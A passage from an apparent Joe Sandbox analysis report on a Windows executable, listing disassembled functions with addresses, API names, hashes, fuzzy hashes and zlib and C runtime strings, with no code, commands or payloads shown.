                                                                                                                                                                                                                                    • API ID: memcpy_s
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1502251526-0
                                                                                                                                                                                                                                    • Opcode ID: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                                                                                                                                    • Instruction ID: 6674aab09c704dc6316480c984b74315968bb3c931fe2d97ac1f824453a82bba
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B4C1F672B1A28687D725DF19A04866BF7A1F7A5784F848138DB4E47748EF7DE801CB40
                                                                                                                                                                                                                                    Function 00007FF7B2B6A474 Relevance: 4.1, Strings: 3, Instructions: 398COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: $header crc mismatch$unknown header flags set
                                                                                                                                                                                                                                    • API String ID: 0-1127688429
                                                                                                                                                                                                                                    • Opcode ID: fcf6ea83c7a46010d3591867e81b0f53761d3f113121264a3729654d2d1b513f
                                                                                                                                                                                                                                    • Instruction ID: 9519d544a518ee4dca5ddc0a5f436f4b2d20a104e5c0257c860362ffa149c546
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fcf6ea83c7a46010d3591867e81b0f53761d3f113121264a3729654d2d1b513f
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FCF1B472A063C54AEBA7AF088088B7BFAA9EF56740F454134DB4987394EFB8E440C754
                                                                                                                                                                                                                                    Function 00007FF7B2B89728 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ExceptionRaise_clrfp
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 15204871-0
                                                                                                                                                                                                                                    • Opcode ID: a4cc0e8a2f7e024105bf8074fef1866164229a93701b52dcf00f6f20498becf3
                                                                                                                                                                                                                                    • Instruction ID: 14f83866e630e44966a2e4d0752a7562b65bbed4f3b9b6f03fe805cd2736a2d2
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a4cc0e8a2f7e024105bf8074fef1866164229a93701b52dcf00f6f20498becf3
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FCB18E73601B898BEB16CF2DC84A36977A0F741B88F148825DB6D877A8DF79D451C710
                                                                                                                                                                                                                                    Function 00007FF7B2B739A4 Relevance: 2.8, Strings: 2, Instructions: 350COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: $
                                                                                                                                                                                                                                    • API String ID: 0-227171996
                                                                                                                                                                                                                                    • Opcode ID: e57f1980f4491aea9eb328a1e81193c2bccc9a7e68d1918bb9b7207cf9600634
                                                                                                                                                                                                                                    • Instruction ID: 7480c3785ca2ff635151fea2c562fe786118d7bb5e08278fce2f3efbec13a686
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e57f1980f4491aea9eb328a1e81193c2bccc9a7e68d1918bb9b7207cf9600634
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ABE1D633B0A64685E76ABE2D805113EB360FF66B48F940135DB1E077B8EF69E851C712
                                                                                                                                                                                                                                    Function 00007FF7B2B6A2DB Relevance: 2.7, Strings: 2, Instructions: 216COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: incorrect header check$invalid window size
                                                                                                                                                                                                                                    • API String ID: 0-900081337
                                                                                                                                                                                                                                    • Opcode ID: 7e7bac63e97a7e962ac1d8bc37368dc0e110af78d4507200a91f80e7c7b94e68
                                                                                                                                                                                                                                    • Instruction ID: 44ae3bdc00e3e1942bcf246b5ee18b918a75d078a8f7f7a6a8cdccb233fc5fbd
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7e7bac63e97a7e962ac1d8bc37368dc0e110af78d4507200a91f80e7c7b94e68
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AC91E772A0928587EBA79E18C448B7FFAA9FF51340F554139DB49867C8EF78E440CB14
                                                                                                                                                                                                                                    Function 00007FF7B2B7DEF0 Relevance: 2.6, Strings: 2, Instructions: 144COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: e+000$gfff
                                                                                                                                                                                                                                    • API String ID: 0-3030954782
                                                                                                                                                                                                                                    • Opcode ID: c8a24eaff8c968987b4d031b15ae93849e98bcf9eddb8930961e84febef9b5bc
                                                                                                                                                                                                                                    • Instruction ID: bc7aa8784db36a01178487b61938f2431c292bace0f57ab76812d45bb98e093d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c8a24eaff8c968987b4d031b15ae93849e98bcf9eddb8930961e84febef9b5bc
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B9519E22B192C145E722AE3DD80176AFB91E756B90F888231CB5C4BAD9EFBDD001C711
                                                                                                                                                                                                                                    Function 00007FF7B2B7DA5C Relevance: 1.5, Strings: 1, Instructions: 254COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: gfffffff
                                                                                                                                                                                                                                    • API String ID: 0-1523873471
                                                                                                                                                                                                                                    • Opcode ID: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
                                                                                                                                                                                                                                    • Instruction ID: 96c1655e764d574bb2763ee2897235069cf7f855e1f4e3d92314198cd22ea40b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2EA15A62A0A7C646EB22EF2D94007AABB91EB667C4F448131DF4D477A9EFBDD401C710
                                                                                                                                                                                                                                    Function 00007FF7B2B78794 Relevance: 1.4, Strings: 1, Instructions: 177COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                    • String ID: TMP
                                                                                                                                                                                                                                    • API String ID: 3215553584-3125297090
                                                                                                                                                                                                                                    • Opcode ID: 55bfb0711aaa24fc3f3c49a17a094aed8874a1becd77c64581317e125ecb5b45
                                                                                                                                                                                                                                    • Instruction ID: 674a92ccb1bb6f05e9ea8b54dea599d2789d7cf52e8103671cbf45ffcdb440c6
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 55bfb0711aaa24fc3f3c49a17a094aed8874a1becd77c64581317e125ecb5b45
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BD51AF01F1A60241EA67BA2E59051BBD2906F66BD4FC85835DF0E477AAFEBCE401D220
                                                                                                                                                                                                                                    Function 00007FF7B2B83480 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: HeapProcess
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 54951025-0
                                                                                                                                                                                                                                    • Opcode ID: 1f9e0516fd534d967cb731c121838b59470578846d262458ea046ba55ab40ebf
                                                                                                                                                                                                                                    • Instruction ID: d7353c15b0500de40410da7fcf92c45a8126f3814829bf436d0f6e323d81ce75
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1f9e0516fd534d967cb731c121838b59470578846d262458ea046ba55ab40ebf
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4CB09B10E07741C1ED463F255C8611562947F55700FD40138C14C44334ED6C10E59711
                                                                                                                                                                                                                                    Function 00007FF7B2B735A0 Relevance: .3, Instructions: 327COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 5eca4e5ff3e7205525bf20f3b63783aa462e3e7adb0228d62bb7e98ab9f5e9bb
                                                                                                                                                                                                                                    • Instruction ID: 738f504de11ccd57143db0460cfc711ac7e30ca989f0c576751396a2a02c9104
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5eca4e5ff3e7205525bf20f3b63783aa462e3e7adb0228d62bb7e98ab9f5e9bb
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DED1DC73B0E64245EB6ABE2D804067FA3A0AB16B48F944135CF0D077E9EFB9E441C752
                                                                                                                                                                                                                                    Function 00007FF7B2B69800 Relevance: .3, Instructions: 287COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e75d751cc15dfd510e55d83c6141b0e8cb11d18cbed01e0c543b372a0114c593
                                                                                                                                                                                                                                    • Instruction ID: 5523a9629e92d2c1388ac8d561d858b664e91fff399a615b4aa0b2521979a5ff
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e75d751cc15dfd510e55d83c6141b0e8cb11d18cbed01e0c543b372a0114c593
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ABC18E762181E08BD28AEB29E47947A73D1F78934DBD5406BEF87477C9CA3CA414DB20
                                                                                                                                                                                                                                    Function 00007FF7B2B72C10 Relevance: .2, Instructions: 241COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: aa73bfa000bc8cd66a05f12d530b76a597660d7bda6a6781f52cf2f49ffced0b
                                                                                                                                                                                                                                    • Instruction ID: 3294e20b93bba098900ca5a1394c69469a06395b508b134d2a6c8ab0fa5c3b10
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aa73bfa000bc8cd66a05f12d530b76a597660d7bda6a6781f52cf2f49ffced0b
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FCB1917290A74585E766AF3DC05013EBBB0E766B48FA40136CB4E473A9EFB9D441C760
                                                                                                                                                                                                                                    Function 00007FF7B2B7E570 Relevance: .2, Instructions: 198COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 9611c2e0762efa78d7f6da3d8515592aa8d86601c49200b7335873453b670326
                                                                                                                                                                                                                                    • Instruction ID: 2075344aac207ff62ba8892727ffe1bde8dc922650f244bd0dd986f2c005e135
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9611c2e0762efa78d7f6da3d8515592aa8d86601c49200b7335873453b670326
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3E81EF72A0938146EB75AB1D944036BAA91FF66794F904235DB8D43BA9EF7CE001CB11
                                                                                                                                                                                                                                    Function 00007FF7B2B86418 Relevance: .2, Instructions: 183COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                                    • Opcode ID: 21aaab296e2e64a79b20cf98ea2699a9ab0529386423cc159892306e5cd43e00
                                                                                                                                                                                                                                    • Instruction ID: e0f95a4b8aff93ab258f607ebaa5bb1a507f024fed8d4a63e80613671f0b825e
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 21aaab296e2e64a79b20cf98ea2699a9ab0529386423cc159892306e5cd43e00
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B4611F21E0A18246F766A52C90586BFE6C0AF77760F98023DD71D4A6DDFEEDE800C720
                                                                                                                                                                                                                                    Function 00007FF7B2B72164 Relevance: .1, Instructions: 146COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                                                                                                                                                                                                    • Instruction ID: fefae981b72ae4a71e91d5a6934315ae2b3890c019769cad16cb2271686ec2d6
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BF51B836A1965186E725AB2DC44023A73A1FB76B58F644135CF8C077B8EF7AE883C750
                                                                                                                                                                                                                                    Function 00007FF7B2B71944 Relevance: .1, Instructions: 146COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
